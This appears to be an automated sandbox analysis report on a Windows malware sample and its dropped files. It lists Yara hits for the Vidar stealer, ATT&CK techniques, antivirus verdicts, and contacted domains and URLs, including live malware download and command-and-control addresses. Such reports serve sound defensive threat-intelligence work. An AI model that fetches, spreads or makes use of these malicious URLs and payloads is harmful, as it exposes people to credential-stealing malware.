Source: Yara match	File source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: 11.3.cttgcew.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q4Z52wRd28.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4Z52wRd28.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cttgcew.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4Z52wRd28.exe.960e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cttgcew.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 36.2.EB2B.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.EB2B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EB2B.exe PID: 5512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EB2B.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EB2B.exe PID: 5828, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	311 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	15 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	912 Process Injection	31 Obfuscated Files or Information	2 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	1 Services File Permissions Weakness	1 Scheduled Task/Job	23 Software Packing	1 Credentials In Files	147 System Information Discovery	Distributed Component Object Model	1 Email Collection	Scheduled Transfer	5 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	441 Security Software Discovery	SSH	1 Input Capture	Data Transfer Size Limits	126 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Services File Permissions Weakness	1 File Deletion	Cached Domain Credentials	331 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	331 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	912 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Rundll32	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
q4Z52wRd28.exe	32%	Virustotal		Browse
q4Z52wRd28.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	100%	Avira	HEUR/AGEN.1233121
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	100%	Avira	HEUR/AGEN.1233121
C:\Users\user\AppData\Local\Temp\F771.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\cttgcew	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B4A7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A852.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\E35A.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\CF35.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	88%	ReversingLabs	Win32.Infostealer.Decred
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	71%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\B4A7.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\CF35.exe	23%	ReversingLabs	Win64.Trojan.Lazy
C:\Users\user\AppData\Local\Temp\E35A.exe	38%	ReversingLabs	Win32.Downloader.Deyma
C:\Users\user\AppData\Local\Temp\EB2B.exe	27%	ReversingLabs	Win32.Trojan.Lazy
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	88%	ReversingLabs	Win32.Infostealer.Decred
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	71%	Metadefender		Browse
C:\Users\user\AppData\Roaming\cttgcew	27%	ReversingLabs	Win32.Trojan.Convagent

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.q4Z52wRd28.exe.960e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
24.3.E35A.exe.880000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
47.0.RegSvcs.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1216913	Download File
0.3.q4Z52wRd28.exe.970000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
24.2.E35A.exe.870e67.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.q4Z52wRd28.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
24.2.E35A.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
11.2.cttgcew.860e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.cttgcew.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
24.2.E35A.exe.bb0000.2.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
11.3.cttgcew.870000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
cdn-102.anonfiles.com	3%	Virustotal	Browse
iujdhsndjfks.ru	0%	Virustotal	Browse
raw.githubusercontent.com	1%	Virustotal	Browse
o36fafs3sn6xou.com	15%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://o3b1wk8sfk74tf.com/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
https://www.youtube.comindex	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://o3npxslymcyfi2.com/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://o3l3roozuidudu.com/	0%	URL Reputation	safe
http://o36fafs3sn6xou.com/Mozilla/5.0	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://o36fafs3sn6xou.com/	0%	URL Reputation	safe
https://raw.githubusercontent.com/decoder1989/Wallet/main/Crypted.exe	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2ResponseX%	0%	Avira URL Cloud	safe
http://65.21.213.208:3000inconsistent	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseinX%	0%	Avira URL Cloud	safe
http://116.202.5.101/446391140202.zip	100%	Avira URL Cloud	malware
https://cdn-102.anonfiles.com/p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe	0%	Avira URL Cloud	safe
https://www.tiktok.com/@user6068972597711	0%	Avira URL Cloud	safe
http://193.56.146.168/mia/solt.exe	100%	Avira URL Cloud	malware
http://116.202.5.101:80	100%	Avira URL Cloud	malware
http://193.56.146.174/g84kvj4jck/index.php?scr=1	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id4X%	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22ResponseX%	0%	Avira URL Cloud	safe
https://studio.youtube.com28421709430404007434844970703125:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn-102.anonfiles.com	195.96.151.51	true	true	3%, Virustotal, Browse	unknown
bitbucket.org	104.192.141.1	true	false		high
github.com	140.82.121.4	true	false		high
iujdhsndjfks.ru	134.0.118.203	true	false	0%, Virustotal, Browse	unknown
raw.githubusercontent.com	185.199.108.133	true	true	1%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
o36fafs3sn6xou.com	77.232.37.228	true	true	15%, Virustotal, Browse	unknown
anonfiles.com	45.154.253.151	true	true		unknown
hoteldostyk.com	43.231.112.109	true	true		unknown
iplogger.com	148.251.234.93	true	false		high
s3-w.us-east-1.amazonaws.com	3.5.21.195	true	false		high
youtube-ui.l.google.com	216.58.215.238	true	false		high
srshf.com	108.167.141.212	true	true		unknown
transfer.sh	144.76.136.153	true	false		high
1ecosolution.it	46.252.148.24	true	true		unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false		high
2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq	unknown	unknown	true		unknown
lentaphoto.at	unknown	unknown	true		unknown
www.youtube.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://193.56.146.168/mia/solt.exe	true	Avira URL Cloud: malware	unknown
https://iplogger.com/2bibu4	false		high
https://raw.githubusercontent.com/decoder1989/Wallet/main/Crypted.exe	false	Avira URL Cloud: safe	unknown
http://193.56.146.174/g84kvj4jck/index.php?scr=1	true	Avira URL Cloud: malware	unknown
http://o3b1wk8sfk74tf.com/	true	URL Reputation: safe	unknown
https://bitbucket.org/globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe	false		high
https://t.me/deadftx	false		high
http://o3npxslymcyfi2.com/	true	URL Reputation: safe	unknown
http://o3l3roozuidudu.com/	true	URL Reputation: safe	unknown
https://cdn-102.anonfiles.com/p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe	false	Avira URL Cloud: safe	unknown
http://116.202.5.101/446391140202.zip	true	Avira URL Cloud: malware	unknown
https://www.tiktok.com/@user6068972597711	true	Avira URL Cloud: safe	unknown
http://o36fafs3sn6xou.com/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.dr	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	39680000161077974836781923.36.dr	false		high
http://116.202.5.101:80	EB2B.exe, 00000024.00000002.525842671.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id12Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm8Dh	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google	EB2B.exe, 00000024.00000003.486203645.00000000275DE000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488632208.00000000273DD000.00000004.00000800.00020000.00000000.sdmp, 65329382289861898742549564.36.dr, 42917201296364153697665931.36.dr	false		high
http://tempuri.org/Entity/Id2ResponseX%	F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6315198?product=	42917201296364153697665931.36.dr	false		high
https://www.youtube.com	RegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://studio.youtube.com/youtubei/v1/security/get_web_reauth_url?alt=json&key=tls:	RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows	42917201296364153697665931.36.dr	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome?p=update_error	EB2B.exe, 00000024.00000002.584817068.00000000276DC000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488205767.00000000273DD000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488388825.00000000275EA000.00000004.00000800.00020000.00000000.sdmp, 65329382289861898742549564.36.dr, 42917201296364153697665931.36.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://studio.youtube.com/reauth	RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://65.21.213.208:3000inconsistent	RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/Google	65329382289861898742549564.36.dr, 42917201296364153697665931.36.dr	false		high
https://api.ip.sb/ip	B4A7.exe, 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, B4A7.exe, 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1ResponseinX%	F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	39680000161077974836781923.36.dr	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://search.yahoo.com/search	explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.comindex	RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/deadftxhttps://www.tiktok.com/	EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://studio.youtube.com/youtubei/v1/ars/grst?alt=json&key=net/http:	RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://o36fafs3sn6xou.com/Mozilla/5.0	explorer.exe, 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.459238945.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000002.777469766.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.465274597.0000000000140000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000002.771553703.0000000000580000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.784028840.0000000003497000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000000.479766782.0000000000510000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000002.774664749.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002B.00000002.778517394.00000000009B8000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22ResponseX%	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4X%	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://studio.youtube.com28421709430404007434844970703125:	RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro	42917201296364153697665931.36.dr	false		high
https://www.google.com/intl/en_uk/chrome/	42917201296364153697665931.36.dr	false		high
